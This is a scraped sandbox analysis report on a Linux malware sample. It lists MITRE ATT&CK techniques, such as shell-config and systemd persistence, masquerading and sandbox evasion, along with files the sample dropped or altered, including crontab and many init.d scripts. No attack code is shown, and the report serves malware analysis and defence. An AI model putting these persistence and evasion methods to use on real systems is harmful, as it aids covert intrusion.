Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report 0S3wxWer8x.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/.mod

/boot/system.pub

/etc/.cfg

/etc/crontab

/etc/init.d/acpid

/etc/init.d/alsa-utils

/etc/init.d/anacron

/etc/init.d/apparmor

/etc/init.d/apport

/etc/init.d/avahi-daemon

/etc/init.d/binfmt-support

/etc/init.d/bluetooth

/etc/init.d/console-setup.sh

/etc/init.d/cron

/etc/init.d/cryptdisks

/etc/init.d/cryptdisks-early

/etc/init.d/cups

/etc/init.d/cups-browsed

/etc/init.d/dbus

/etc/init.d/dns-udp4

/etc/init.d/gdm3

/etc/init.d/hddtemp

/etc/init.d/hwclock.sh

/etc/init.d/irqbalance

/etc/init.d/iscsid

/etc/init.d/keyboard-setup.sh

/etc/init.d/kmod

/etc/init.d/lightdm

/etc/init.d/lm-sensors

/etc/init.d/lvm2-lvmpolld

/etc/init.d/mono-xsp4

Linux Analysis Report
0S3wxWer8x.elf